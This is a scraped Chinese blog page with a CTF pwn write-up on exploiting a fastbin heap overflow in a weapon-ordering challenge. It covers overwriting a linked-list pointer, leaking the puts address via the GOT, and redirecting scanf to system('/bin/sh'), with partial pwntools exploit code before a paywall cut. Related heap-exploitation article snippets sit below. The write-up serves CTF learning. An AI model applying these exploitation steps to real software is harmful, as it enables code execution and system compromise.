CTF PWN Fastbin堆溢出入门

最新推荐文章于 2023-11-17 11:31:15 发布
最新推荐文章于 2023-11-17 11:31:15 发布
阅读量601 收藏
点赞数
分类专栏: 网络攻防 文章标签: pwn CTF fastbin rifle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liucc09/article/details/111058259
版权
本文详细介绍了CTF PWN中利用Fastbin堆溢出获取shell的解题思路和具体步骤。首先,通过溢出覆盖武器链表中的上一个武器内存地址,进而控制内存释放。接着,利用malloc重新分配已释放到fastbin的message指针内存,篡改其指向为scanf的got表地址。进一步泄露puts函数地址计算system地址,最后修改got表使scanf调用system("/bin/sh"),成功获得shell。
摘要由CSDN通过智能技术生成

目标程序及EXP下载

解题思路

  1. 添加新武器时会在偏移52个字节的地方存下上一个武器的内存地址如下:
*((_DWORD *)dword_804A288 + 13) = v1;
//13个DWORD就是13*4=52字节
  1. 输入武器名时存在溢出,因此可以覆盖这个地址,指向另一片内存;
  2. 提交订单时会通过单向链表的方式free各个武器的内存区域,由于第1步中可以修改武器链表的上一个武器内存地址,因此可以释放一个我们指定的内存到fastbin中;
  3. 我们指定的内存肯定得是我们可以控制的内存,例如程序中的message指针;
  4. 重新添加武器会malloc得到message指针所在的内存,因此可以修改message指针指向的位置,例如改成scanf的got表位置;
  5. 通过message留言可以修改scanf的got表指向的地址为system的地址;
  6. 然后输入“/bin/sh”给scanf就相当于system("/bin/sh")从而得到shell

具体步骤

  1. 得到system的地址
    程序中没有system函数,因此要通过泄漏puts等函数的实际地址计算system函数的地址;
    程序中的show rifle函数会通过单向链表级联打印所有rifle的信息,由于链表受我们控制,我们可以让链表指向puts的got表,从而打印出puts的地址:
name = 'a'*(52-25) + p32(elf.got['puts']) #从第52个字节开始是上一个rifle的内存地址,这里改成我们要打印的地址

add(name,'b'*23)
show_added()

r.recvuntil("===================================\n")
r.recvuntil("===================================\n")
r.recvuntil("Description: ")

puts_addr = u32(r.recv(4).ljust(4,b'\x00')) #Description后面紧跟的就是puts got表中的内容,即puts的实际地址
log.success("puts_addr:"+hex(puts_addr))

libc_base = puts_addr-libc.symbols['puts']
system_addr
最低0.47元/天 解锁文章
liucc09
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf溢出
m0_49959202的博客
11-01 1069
文章目录溢出1.介绍2.示例3.小结3.1 寻找分配函数3.1.1 malloc3.1.2 calloc3.1.3 relloc3.2 寻找危险函数函数3.3 确定填充长度 溢出 1.介绍 溢出指的是程序向某个块中写入的字节数超过了块本身可使用的字节数(块本身可使用的字节数>用户申请的字节数),因此导致了溢出,并覆盖到物理相邻的高地址的下一个块。 原理和栈溢出基本一样,不过溢出很难像栈溢出一样直接控制程序指向流程。一般溢出的策略为: 覆盖与其物理相邻的下一个chunk内容。
fastbin attack快速入门
abelxu
11-13 1158
0x01 fastbin简介 Fastbin包含0x20~0x80大小bin的数组指针,用于快速分配小块。fastbin按照单链表结构进行组织,相同大小的bin在同一个链表中,fd指向下一个bin,采用LIFO(Last In First Out)机制。在fastbin中,块的inuse标志都为1,处于占用状态,防止chunk释放时进行合并,加快小块的分配。 正常fastbin的使用 通过这个简单的案例来了解fastbin的单链表结构,malloc和free的过程。 #include<stdio
ctfwiki溢出总结
eeeeeight的博客
04-12 850
溢出小总结 Column: Apr 12, 2021 Tags: Pwn, summary 开头的一些碎碎念: 除了fastbin大小的chunk,其余物理相邻topchunk的chunk在free之后都会合并进topchunk 利用malloc_hook通常是在main_arena-0x23-8的位置有个0x7f可以被识别为fakechunk(free_hook还不会,悲) Uaf: 被free之后,指向其的指针未被置空导致fd与bk之类的关键信息可以被编辑, 还有一种就是double free之类的
CTF溢出-unlink原理探究
热门推荐
BadRer的博客
06-12 1万+
来干!来干! 转战溢出,这东东确实接触的很少,听说很神奇很细腻。我也是初次接触就和大家一起共同学习下,也填补下这方面的空白。 https://sploitfun.wordpress.com/2015/02/26/heap-overflow-using-unlink/ 这篇文章讲的就是溢出的原理,不过全是英文,估计。。。慢慢看,不急。我就结合着它给的示例程序来分析下原理,以及如何利用溢出
Fastbin 溢出 Use After Free
小龙在线
10-01 190
shell 地址 #-*- coding: utf-8 -*- from pwn import * elf = ELF('./fastbin') sh = process('./fastbin') getshell = 0x80487c6 def Add(num): sh.sendafter('choice:\n', '1') sh.sendafter('id:\n', str(num)) def Del(num): sh.sendafter('choice:\n', '2') sh.se
CTF pwn入门 -- Fast bin
lifanxin的博客
04-07 2441
这里写目录标题概述攻击方式实现任意地址分配fast bin poisoninghouse of spirit总结 概述   Fast bin利用中最常遇见的情况,常见于libc2.23版本的pwn题中,在那个版本中还没有Tcache机制,在那个版本中漏洞利用还很轻松(????)。   这里简单总结一下fast bin的性质,64位机器下fast bin大小为0x20 – 0x80字节,每个bin链表之间以0x10字节递增;32位机器下为0x10 – 0x40,每个bin链表之间以0x8字节递增(上面的大
CTF pwn入门 -- Unsorted bin
lifanxin的博客
04-08 3235
Unsorted bin概述攻击方式泄露libc地址总结 概述   Unsorted bin也是题中常见的,当一个块被释放时,且该块大小不属于fast bin(libc-2.26之后要填满tcache),那么在进入small bin和large bin之前,都是先加入到unsorted bin的。之后当我们再次分配内存到unsorted bin上寻找时,如果申请的内存块小于寻找的unsorted bin,那么会将该内存块切割后返回给用户,剩下的仍然保存在unsorted bin上;如果申请的内存
CTF资料-0x0002】PWN简易Linux利用入门教程by arttnba3
arttnba3的博客
02-25 5704
CTF资料-0x0002】简易Linux利用入门教程by arttnba3老生常谈,[GITHUB BLOG ADDR](https://archive.next.arttnba3.cn/2021/02/24/%E3%80%90CTF%E8%B5%84%E6%96%99-0x0002%E3%80%91%E7%AE%80%E6%98%93Linux%E5%A0%86%E5%88%A9%E7%94%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8Bby%20arttnba3/),请
pwn 入门fastbin attack
清霂的博客
04-02 322
目录floworeo b站原本有一个对基础讲的挺好的,好像叫pwn术进阶的溢出,但刚刚去看已经没了,好家伙,还好我刚看完,哈哈哈。 flow 涅普计划-ctf入门溢出 #!/usr/bin/env python2 from pwn import * context(os="linux", arch="amd64", log_level="debug") #libc libc=ELF("libc.so.6") malloc_libc=libc.symbols['__malloc_hook'] m
快速入门溢出技巧(OFF BY ONE)
wulanlin的博客
01-11 625
OFF BY ONE 所谓OFF BY ONE就是利用溢出一个字节到下一个块,使得目前块与下一块合并成一个块,此时块的大小就是我们溢出的那一字节 并且块的fd(前驱指针)以及bk(后继指针)都会指向 main_arena+88的地址这也是我们泄露出来的地址 利用gdb 输入libc查看基地址,main_arena+88-libc=offset UNSORTERBIN&FASTBINS 在块的bins中分为fastbins,largebins,smallbins还有今天要用
CTF-PWN--【溢出相关概括基本流程及first-fit演示与】
llovewuzhengzi的博客
11-17 384
中写入的字节数超过本身可使用的字节数(可使用的字节数不一定等于申请的字节数,是因为管理器会对用户所申请的字节数进行调整,这也导致可利用的字节数都不小于用户申请的字节数),所以可能覆盖到相邻高地址的下一个块。chunkdata段地址对应的chunk与topchunk不相邻,相当于free(chunkdata段地址),malloc(size)相差容得下一个最小chunk,则切割chunk两部分,free掉chunkdata段地址对应的chunk的size-size的部分。一个三目运算符 a?
Linux 溢出fastbin实例
M021的专栏
11-11 3988
Linux下溢出 fastbin实例
CTF|栈溢出入门题level0解题思路及个人总结
skyattractive的博客
06-01 1221
CTF|栈溢出入门题level0解题思路及个人总结 解题思路 file 查看文件信息:elf、64位、小端序、可执行 拿到题目简单运行一下,发现还是一如既往的简单 拖入64位IDA中反编译 发现vulnerable(指脆弱的、有漏洞的)function 双击打开 func中定义了char型的buf,大小从rbp到rsp共占80个字节 read()函数读入到标准输入设备两百个字节(远大于buf所占空间大小)存在栈溢出 双击buf看它在栈中的位置 发现在0x0之后,可以将system函数写入r所在的位
pwn工具箱之fastbin attack
jmp esp
05-22 2239
fastbin attack基本信息 利用类型: 利用 利用类型: 针对fastbin的利用 利用思想: 利用fastbin的free只检查是否和上一个freechunk相等,使得同一个chunk两次进入free list,造成UAF,可以更改fastbin free chunk的fd信息,最终分配一个特定地址 利用难点 需要能够两次free同一个chunk 更改fd的时候,为了能够在之后的ma
pwn题中fastbin的利用
Vicl1fe的博客
09-28 659
参考和题目链接链接:https://paper.seebug.org/445/#pwnfastbin 前言 这个题,我搞了有一天,没搞出来,就在我快放弃的时候,才终于解出来,可能系统不一样,我覆盖不了参考文章的地址,最后我覆盖了别的地址。具体来看看吧。 ...
PWNFastbin 与 Tcache 的利用
u014377094的博客
05-03 1123
从本周开始,针对ctfwiki的顺序,整理的攻击方式,顺便练一下手。克服惰性与抗拒,才能继续进步。 首先是为何把fastbin和tcache放第一个整理,因为fastbin和tcache是所有后续攻击的基础,为了实现写入“任意”地址,通常情况下都是利用fastbin和tcache,有个明显的原因就是fastbin和tcache都采用单链表结构,结构更加简单,简单也意味着缺少复杂的检测,更加利于我们去利用。其次,为何把它俩放一起,原因还是两者的结构相似,地位相近,但细节上有不同,放在一起对比利用。 再说
CTF 基本知识
Oranges.的博客
11-07 3764
CTF简介 中文译为夺旗赛 竞赛模式 解题模式:类似于ACM编程竞赛、信息学奥数,以解决网络安全技术挑战题目的分值和时间排名,通常用于线上选拔赛,题目包括逆向、漏洞挖掘与利用、web渗透、密码、取证、隐写、安全编程等 攻防模式:参赛队伍在网络空间互相进行攻击与防守,挖掘网络服务漏洞并攻击对手来得分,修补自身服务漏洞进行防御来避免丢分 混合模式:解题模式与攻防模式相结合的赛制。 题目类型 Web web是ctf竞赛中主要题型之一,题目设计许多常见web漏洞,如sql注入、xss、文件包含、上传
pwn学习-how2heap-fastbin_dup
qq_39153247的博客
08-20 1477
今天打完比赛身心疲惫,来复习复习把,写一点简单的把   之所以记录一下fastbin,是因为现阶段我能接触到最多的就是它了。   fastbins: 程序中总是会分配一些比较小的块,对于这些块来说,如果我们直接将他们合并,那么下次申请的时候还需要重新切割出来,降低了运行的效率,所以ptmalloc设计了fastbins. fastbins共有10个bin,分别是8-80字节,依次增...
ctf pwn read溢出
最新发布
06-06
CTF(Capture the Flag)中的PWN(Practical Web exploitation,通常指payload writing)是指渗透测试或漏洞利用中的技术挑战,特别是关于控制流劫持(Control Flow Hijacking)的子领域,如read溢出。Read溢出通常...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值